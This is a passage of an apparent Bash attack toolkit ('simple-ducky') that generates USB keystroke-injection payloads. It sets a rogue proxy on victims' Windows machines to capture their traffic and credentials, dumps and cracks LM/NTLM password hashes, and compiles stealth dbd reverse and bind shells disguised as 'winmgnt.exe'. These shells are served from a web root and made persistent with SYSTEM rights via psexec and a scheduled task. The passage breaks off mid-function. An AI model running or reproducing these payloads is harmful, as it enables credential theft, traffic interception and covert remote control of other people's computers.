| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)" | |
| echo "" | |
| echo "" | |
| read -p "What IP/domain would you like to use for your proxy server? " attackerip | |
| echo "" | |
| read -p "What port will you be using for your proxy server (example: 8081)? " attackerport | |
| echo "" | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/proxyinthemiddleXPVIS7.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mLaunching Burp Suite...\e[0m" | |
| echo "" | |
| sleep 2 | |
| x-terminal-emulator -e java -jar -Xmx1024m /usr/bin/burpsuite.jar & | |
| clear | |
| echo -e "\e[1;34mSet the following options in Burp Suite...\e[0m" | |
| echo "" | |
| sleep 2 | |
| echo "" | |
| echo '1) Select the "Proxy" tab' | |
| echo "" | |
| echo '2) Under "Intercept" ensure that "Intercept is off"' | |
| echo "" | |
| echo '3) Select the "Options" tab under "Proxy"' | |
| echo "" | |
| echo "4) Under "Proxy Listeners" select "Add" to add a new listener" | |
| echo "" | |
| echo "5) In the "Bind to port:" radio box put $attackerport" | |
| echo "" | |
| echo "6) Click the "Specific address:" radio button and select $attackerip / the attacking machines IP address" | |
| echo "" | |
| echo "7) Select the "History" tab to view the traffic from the victims machine" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Proxy in the Middle (PiTM) | no admin needed (Windows 8) | |
| ################################################################################# | |
| f_proxyinthemiddleWIN8(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload sets up a proxy server on the vicitims machine. It then launches Burpsuite and allows the attacker to see everything that the victim browses to and it will even hand over the credentials to any website visited." | |
| echo -e "\e[1;31mNote:\e[0m This payload does not require any admin access. Although, some corporate networks man have policies in place to block normal users from altering the proxy settings." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)" | |
| echo "" | |
| echo "" | |
| read -p "What IP/domain would you like to use for your proxy server? " attackerip | |
| echo "" | |
| read -p "What port will you be using for your proxy server (example: 8081)? " attackerport | |
| echo "" | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/proxyinthemiddleWIN8.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mLaunching Burp Suite...\e[0m" | |
| echo "" | |
| sleep 2 | |
| x-terminal-emulator -e java -jar -Xmx1024m /usr/bin/burpsuite.jar & | |
| clear | |
| echo -e "\e[1;34mSet the following options in Burp Suite...\e[0m" | |
| echo "" | |
| sleep 2 | |
| echo "" | |
| echo '1) Select the "Proxy" tab' | |
| echo "" | |
| echo '2) Under "Intercept" ensure that "Intercept is off"' | |
| echo "" | |
| echo '3) Select the "Options" tab under "Proxy"' | |
| echo "" | |
| echo '4) Under "Proxy Listeners" select "Add" to add a new listener' | |
| echo "" | |
| echo "5) In the "Bind to port:" radio box put $attackerport" | |
| echo "" | |
| echo "6) Click the "Specific address:" radio button and select $attackerip / the attacking machines IP address" | |
| echo "" | |
| echo '7) Select the "History" tab to view the traffic from the victims machine' | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| ################################################################################# | |
| # | |
| # Misc Options (Cleanup, JAVA update & Password Hasher) | |
| # | |
| ################################################################################# | |
| ################################################################################# | |
| ################################################################################# | |
| # Directoy Cleanup | |
| ################################################################################# | |
| f_cleanup(){ | |
| clear | |
| echo -e "\e[1;34mRemoving old files..." | |
| sleep 1 | |
| rm *.txt | |
| rm *.bin | |
| rm *.html | |
| clear | |
| echo -e "\e[1;34mDone! Returning to the main menu." | |
| sleep 2 | |
| simple-ducky | |
| } | |
| ################################################################################# | |
| # FTP Server Setup | |
| ################################################################################# | |
| f_ftpsetup(){ | |
| clear | |
| echo -e "\e[1;34mWhat would you like to do?\e[0m" | |
| echo "" | |
| echo "1. Initial Pure-FTPD setup" | |
| echo "2. Add a new user to the server" | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;31mNote:\e[0m The initial setup is done during the installation process." | |
| echo "" | |
| read -p "Option: " option | |
| if [ "$option" == "1" ]; then | |
| clear | |
| echo -e "\e[1;34mLets start setting up your pure-ftpd server\e[0m" | |
| echo "" | |
| read -p "[-] Who would you like the primary user to be? " ftpusername | |
| echo "" | |
| echo -e "\e[1;33m[-] Configuring pure-FTPD for: $ftpusername\e[0m" | |
| echo "" | |
| sleep 3 | |
| groupadd ftpgroup | |
| useradd -g ftpgroup -d /dev/null -s /etc ftpuser | |
| echo -e "\e[1;33m[-] Please set the password for $ftpusername.\e[0m" | |
| pure-pw useradd $ftpusername -u ftpuser -d /ftphome | |
| pure-pw mkdb | |
| cd /etc/pure-ftpd/auth/ | |
| ln -s ../conf/PureDB 60pdb | |
| echo "" | |
| echo -e "\e[1;33m[-] Creating your home directory, it will reside at /ftphome/\e[0m" | |
| echo "" | |
| sleep 3 | |
| mkdir /ftphome | |
| chown -R ftpuser:ftpgroup /ftphome/ | |
| echo -e "\e[1;33m[-] Starting the FTP server.\e[0m" | |
| echo "" | |
| sleep 2 | |
| service pure-ftpd restart | |
| echo "" | |
| echo -e "\e[1;32m[+] Done! To test your new account, in a new terminal type: ftp 127.0.0.1\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| read -p "Who would you like to add to the FTP server? " ftpusername | |
| pure-pw useradd $ftpusername -u ftpuser -d /ftphome | |
| pure-pw mkdb | |
| echo "" | |
| echo -e "\e[1;34mRestarting the FTP server.\e[0m" | |
| echo "" | |
| sleep 3 | |
| service pure-ftpd restart | |
| clear | |
| echo -e "\e[1;34mDone! To test your new account, in a new terminal type: ftp 127.0.0.1\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| simple-ducky | |
| fi | |
| } | |
| ################################################################################# | |
| # LM/NTLM Password Hasher | |
| ################################################################################# | |
| f_lmntlmhasher(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m LM/NTLM Password Hasher..." | |
| echo -e "\e[1;31mNote:\e[0m If you used the 'LM/NTLM Hash Dump From Live System' payload make sure you extract the .zip files first." | |
| echo "" | |
| echo "" | |
| read -p "Would you like me to extract the encrypted zip files [y|n]? " extract | |
| echo "" | |
| if [ "$extract" == "y" ]; then | |
| read -p "What is the password for the encrypted zip files? " zippass | |
| echo "" | |
| else | |
| echo "" | |
| fi | |
| echo "What is the path of the SAM & SYSTEM files, make sure you specify the complete path?" | |
| echo "" | |
| read -p "[Example: /ftphome/ (default ftp directory) or /root/Desktop/] " hashpath | |
| clear | |
| if [ "$extract" == "y" ]; then | |
| echo -e "\e[1;34mExtracting the zip files...\e[0m" | |
| sleep 3 | |
| echo "" | |
| cd $hashpath | |
| 7za x SAM.zip -p$zippass | |
| 7za x SYSTEM.zip -p$zippass | |
| 7za x ntds.zip -p$zippass | |
| echo "" | |
| else | |
| echo "" | |
| fi | |
| echo -e "\e[1;34mMerging the SAM & SYSTEM files\e[0m" | |
| sleep 3 | |
| echo "" | |
| cd $hashpath | |
| bkhive SYSTEM pass.txt | |
| samdump2 SAM pass.txt > hash.txt | |
| rm pass.txt | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mDone! Here's your LM/NTLM hashes...\e[0m" | |
| echo "" | |
| cat hash.txt | |
| echo "" | |
| echo -e "\e[1;34mThe fastest way to crack these hashes is with Rainbow Tables...\e[0m" | |
| echo -e "\e[1;34mOn-line Rainbow Table:\e[0m http://www.md5decrypter.co.uk/ntlm-decrypt.aspx" | |
| echo "" | |
| echo -e "\e[1;34mOr if you would like, I can launch John to attempt to crack the hashes...\e[0m" | |
| read -p "Would you like me to launch John [y|n]? " launchjohn | |
| clear | |
| if [ "$launchjohn" == "y" ]; then | |
| x-terminal-emulator -e john hash.txt --format=nt2 & | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Site2lst Custom Wordlist Builder | |
| ################################################################################# | |
| f_site2lst(){ | |
| clear | |
| echo -e "\e[1;31mSite2Lst Custom Wordlist Builder\e[0m" | |
| echo "This function clones any website you would like and builds a custom wordlist based on the words extracted." | |
| echo -e "\e[1;31mOrignal Concept by:\e[0m PaulDotCom" | |
| echo -e "\e[1;31mPaulDotCom Article:\e[0m http://pauldotcom.com/2008/11/creating-custom-wordlists-for.html" | |
| echo -e "\e[1;31mScript Assembled by:\e[0m Travis Weathers (skysploit) | skysploit@gmail.com" | |
| echo "" | |
| echo -e "\e[1;34mWhere do you want to store the password list?\e[0m" | |
| echo -e "\e[1;34mDefine the full path [i.e. /root/Desktop or /usr/share/wordlists]\e[0m" | |
| echo "" | |
| read -p "Path: " newpath | |
| echo "" | |
| echo"" | |
| echo -e "\e[1;34mWhat is the target website [Example: www.example.com]?\e[0m" | |
| echo"" | |
| read -p "Target Website: " targetsite | |
| echo "" | |
| echo"" | |
| echo -e "\e[1;34mHow many levels deep would you like to go [Example: 2 | this will clone the first two directories of the website]?\e[0m" | |
| echo"" | |
| read -p "Number of directories: " directoryscan | |
| echo "" | |
| echo"" | |
| echo -e "\e[1;34mWhat would you like to name the wordlist [Example: example.lst]?\e[0m" | |
| echo "" | |
| read -p "Wordlist name: " lstname | |
| echo"" | |
| echo -e "\e[1;34mWould you like to merge your password list with the default John the Ripper list?\e[0m" | |
| echo"" | |
| read -p "[y|n]: " mergelst | |
| clear | |
| mkdir $newpath/wordlist/ | |
| cd $newpath/wordlist/ | |
| clear | |
| echo -e "\e[1;34m[+] Cloning $targetsite, this may take a while...\e[0m" | |
| sleep 3 | |
| echo "" | |
| wget -r -l $directoryscan $targetsite | |
| echo "" | |
| echo -e "\e[1;32m[+] The cloning process has finished.\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34m[+] Replacing spaces with new line characters to produce a unique list...\e[0m" | |
| sleep 3 | |
| grep -hr "" $targetsite/ | tr '[:space:]' '\n' | sort | uniq > wordlist.lst | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34m[+] Removing odd characters (mainly HTML tags)...\e[0m" | |
| sleep 3 | |
| egrep -v '('\,'|'\;'|'\}'|'\{'|'\<'|'\>'|'\:'|'\='|'\"'|'\/'|'\/'|'\['|'\]')' wordlist.lst | sort -u > wordlist.clean.lst | |
| sed 's/[)(]//g' wordlist.clean.lst > wordlist.clean2.lst | |
| if [ "$mergelst" == "y" ]; then | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34m[+] Merging our wordlist with the default John the Ripper list....\e[0m" | |
| sleep 3 | |
| cp /usr/share/john/password.lst password.lst | |
| cat password.lst >> wordlist.clean2.lst | |
| rm password.lst | |
| echo "" | |
| echo "" | |
| else | |
| echo "" | |
| echo "" | |
| fi | |
| echo -e "\e[1;34m[+] Applying some rules and finializing the output...\e[0m" | |
| sleep 3 | |
| echo"" | |
| john --wordlist=wordlist.clean2.lst --rules --stdout | uniq > $lstname | |
| echo "" | |
| echo -e "\e[1;34m[+] Cleaning up our mess...\e[0m" | |
| sleep 3 | |
| rm wordlist.clean2.lst | |
| rm wordlist.clean.lst | |
| rm wordlist.lst | |
| rm -rf $targetsite/ | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;32m[+] Done! your new list is located here: $newpath/wordlist/$lstname\e[0m" | |
| sleep 3 | |
| nautilus $newpath/wordlist/ && | |
| echo "" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| clear | |
| f_mainmenu | |
| } | |
| ################################################################################# | |
| ################################################################################# | |
| # | |
| # Advanced Features | |
| # | |
| ################################################################################# | |
| ################################################################################# | |
| ################################################################################# | |
| # Advanced Features | |
| ################################################################################# | |
| #f_advancebanner(){ | |
| # clear | |
| # echo -e "\e[1;31mYou have found the advanced menu!\e[0m " | |
| # echo -e 'This area is designed for advanced users and developers. Consider this area the "beta" testing section of the simple-ducky. From now on this is where all the R&D will happen.' | |
| # echo -e "If you would like to submit your work for R&D send it to skysploit@gmail.com" | |
| # echo -e "\e[1;31mNote:\e[0m Have fun with the features while you are here. But please don't share how you got to these features in public forums as I do not have time to discuss the functions and extras that may be in this section." | |
| # echo -e "\e[1;31mLast R&D Update:\e[0m 13 Jun 2013" | |
| # echo -e "" | |
| #} | |
| ################################################################################# | |
| # Advanced Menu | |
| ################################################################################# | |
| #f_advancedmenu(){ | |
| #f_advancebanner | |
| # echo -e "\e[1;34mWhere would you like to start?\e[0m" | |
| # echo "" | |
| # echo "1. Durandal Backdoor (Payload only no inject.bin | Works GREAT!)" | |
| # echo "2. DBD Payload w/inject.bin (NT/SYSTEM Persistent Shell)" | |
| # echo "3. Custom Payload Builder (Pulls from all the payloads offered by the Simple-Ducky)" | |
| # echo "4. Install DBD (Required)" | |
| # echo "5. Return to the Main Menu" | |
| # echo "6. Quit" | |
| # echo "" | |
| # read -p "Option: " option | |
| # | |
| # case $option in | |
| # 1) f_dbdbuilder ;; | |
| # 2) f_windowsdbdmenu ;; | |
| # 3) f_payloadbuilder ;; | |
| # 4) f_dbdinstaller ;; | |
| # 5) f_mainmenu ;; | |
| # 6) clear;exit ;; | |
| # *) clear;exit ;; | |
| # esac | |
| #} | |
| ################################################################################# | |
| # DBD Payload Builder | |
| ################################################################################# | |
| f_dbdbuilder(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0mdbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. dbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. dbd supports TCP/IP communication only. Source code and binaries are distributed under the GNU General Public License." | |
| echo -e "\e[1;31mNote:\e[0m You must install mingw32 to compile DBD executables. This should be done on install but if not, run the 'Dependency Checker' on the Main Menu." | |
| echo -e "\e[1;31mNote:\e[0m Currently having issues with the bind shell option... It will be addressed in the next update." | |
| echo -e "\e[1;31mSpecial thanks to:\e[0m Durandal for creating dbd and sharing it with the community." | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mWhat kind of payload would you like to build?\e[0m" | |
| echo "" | |
| echo "1. Windows DBD Reverse Shell" | |
| echo "2. Windows DBD Bind Shell (work in progress)" | |
| echo "3. Linux/NetBSD/FreeBSD/OpenBSD DBD Reverse Shell" | |
| echo "4. Linux/NetBSD/FreeBSD/OpenBSD DBD Bind Shell" | |
| echo "5. Install DBD (Required to receive dbd shells)" | |
| echo "6. Return to the Main Menu" | |
| echo "7. Quit" | |
| echo "" | |
| read -p "Option: " option | |
| if [ "$option" == "1" ]; then | |
| clear | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| echo -e "\e[1;34mGenerating your payload...\e[0m" | |
| echo "" | |
| sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make mingw-cross CFLAGS=-DSTEALTH | |
| cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.exe | |
| clear | |
| #rm dbd.exe | |
| cd /usr/share/simple-ducky | |
| echo -e "\e[1;34mDone! Your payload is located at /var/www/winmgnt.exe\e[0m" | |
| echo "" | |
| read -p "Would you like me to launch a listener [y|n]? " listener | |
| echo "" | |
| if [ "$listener" == "y" ]; then | |
| x-terminal-emulator -e dbd -lvp $attackerport -k $attackersecret & | |
| read -p "Press any key to contiue" enter | |
| clear | |
| f_mainmenu | |
| else | |
| echo -e "\e[1;34mWhen you are ready to receive your shell in your terminal enter:\e[0m" | |
| echo "dbd -lvp $attackerport -k $attackersecret" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| clear | |
| f_mainmenu | |
| fi | |
| elif [ "$option" == "2" ]; then | |
| clear | |
| read -p "What port would you like the victim be listening on? " attackerport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| echo -e "\e[1;34mGenerating your payload...\e[0m" | |
| echo "" | |
| sleep 3 | |
| sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_bind.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_bind_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make mingw-cross CFLAGS=-DSTEALTH | |
| cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.exe | |
| clear | |
| #rm dbd.exe | |
| cd /usr/share/simple-ducky | |
| echo -e "\e[1;34mDone! Your payload is located at /var/www/winmgnt.exe\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhen you are ready to connect to the victim, in your terminal enter:\e[0m" | |
| echo "dbd -nv victim.host.orip $attackerport -k $attackersecret" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| clear | |
| f_mainmenu | |
| elif [ "$option" == "3" ]; then | |
| clear | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| echo -e "\e[1;34mGenerating your payload...\e[0m" | |
| echo "" | |
| sleep 3 | |
| sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_unix_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_unix_reverse1.conf | |
| sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_unix_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_unix_reverse2.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_unix_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_unix_reverse1.conf | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_unix_reverse2.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make unix | |
| chmod +x dbd | |
| cp /usr/share/simple-ducky/misc/dbd/dbd /var/www/... | |
| #rm dbd | |
| clear | |
| cd /usr/share/simple-ducky | |
| echo -e "\e[1;34mDone! Your payload is located at /var/www/...\e[0m" | |
| echo "" | |
| read -p "Would you like me to launch a listener [y|n]? " listener | |
| echo "" | |
| if [ "$listener" == "y" ]; then | |
| x-terminal-emulator -e dbd -lvp $attackerport -k $attackersecret & | |
| read -p "Press any key to contiue" enter | |
| clear | |
| f_mainmenu | |
| else | |
| echo -e "\e[1;34mWhen you are ready to receive your shell in your terminal enter:\e[0m" | |
| echo "dbd -lvp $attackerport -k $attackersecret" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| clear | |
| f_mainmenu | |
| fi | |
| elif [ "$option" == "4" ]; then | |
| clear | |
| read -p "What port would you like the victim be listening on? " attackerport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| echo -e "\e[1;34mGenerating your payload...\e[0m" | |
| echo "" | |
| sleep 3 | |
| sed "/HOST/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_unix_bind.conf > /usr/share/simple-ducky/misc/dbd/dbd_unix_bind1.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_unix_bind1.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_unix_bind1.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make unix | |
| chmod +x dbd | |
| cp /usr/share/simple-ducky/misc/dbd/dbd /var/www/... | |
| #rm dbd | |
| clear | |
| cd /usr/share/simple-ducky | |
| echo -e "\e[1;34mDone! Your payload is located at /var/www/...\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhen you are ready to connect to the victim, in your terminal enter:\e[0m" | |
| echo "dbd -nv victim.host.orip $attackerport -k $attackersecret" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| clear | |
| f_mainmenu | |
| elif [ "$option" == "5" ]; then | |
| clear | |
| f_dbdinstaller | |
| elif [ "$option" == "6" ]; then | |
| clear | |
| f_mainmenu | |
| elif [ "$option" == "7" ]; then | |
| clear;exit | |
| else | |
| f_dbdbuilder | |
| fi | |
| } | |
| ################################################################################# | |
| # Windows DBD Menu | |
| ################################################################################# | |
| f_windowsdbdmenu(){ | |
| clear | |
| echo -e "\e[1;34mWhere would you like to start?\e[0m" | |
| echo "" | |
| echo "1. Windows DBD Reverse/Bind Shell (NT/SYSTEM Shell|Win Vista/7) w/UAC" | |
| echo "2. Windows DBD Reverse/Bind Shell (NT/SYSTEM Shell|Windows 8) w/UAC" | |
| echo "3. Return to the Advanced Menu" | |
| echo "4. Quit" | |
| echo "" | |
| read -p "Option: " option | |
| if [ "$option" == "1" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_windowsdbdVIS7uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_windowsdbdVIS7nouac | |
| fi | |
| elif [ "$option" == "2" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_windowsdbdWIN8uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_windowsdbdWIN8nouac | |
| fi | |
| elif [ "$option" == "3" ]; then | |
| f_advancedmenu | |
| elif [ "$option" == "4" ]; then | |
| clear;exit | |
| elif [ "$option" == "*" ]; then | |
| clear;exit | |
| fi | |
| } | |
| ################################################################################# | |
| # DBD Installer | |
| ################################################################################# | |
| f_dbdinstaller(){ | |
| clear | |
| echo -e "\e[1;34mPlease wait while I install DBD on your machine...\e[0m" | |
| echo "" | |
| sleep 3 | |
| cp /usr/share/simple-ducky/misc/dbd/conf/dbd_defaults.conf /usr/share/simple-ducky/misc/dbd/dbd.h | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make unix | |
| chmod +x dbd | |
| cp dbd /usr/share/simple-ducky/misc/dbd/binaries/ | |
| mv dbd /usr/bin/ | |
| cd /usr/share/simple-ducky/ | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Main Menu...\e[0m" | |
| echo "" | |
| sleep 3 | |
| f_mainmenu | |
| } | |
| ################################################################################# | |
| # DBD Shell w/UAC (Admin Priv Shell|Win Vista/7) | |
| ################################################################################# | |
| f_windowsdbdVIS7uac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses a custom dbd executable (bind/reverse shell) and psexec to give the attacker a persistent shell with NT/SYSTEM ACCESS!! DBD uses a 128bit secure connection! In addition a task is scheduled to relaunch the shell every time a new user logs in. " | |
| echo -e "\e[1;31mNote:\e[0m Special thanks to durandal for developing dbd and helping me fine tune this incredible fast and powerful payload" | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m skysploit " | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLets start by building your evil executable\e[0m" | |
| echo "" | |
| read -p "Would you like a reverse or bind shell [rev|bind]? " payloadtype | |
| echo "" | |
| if [ "$payloadtype" == "rev" ]; then | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m" | |
| sleep 3 | |
| sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make mingw-cross CFLAGS=-DSTEALTH | |
| cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt | |
| cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt | |
| rm dbd.exe | |
| cd /usr/share/simple-ducky | |
| elif [ "$payloadtype" == "bind" ]; then | |
| read -p "What port do you want the victim to be listening on? " victimport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m" | |
| sleep 3 | |
| sed "/HOST/s/victimport/$victimport/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_bind.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
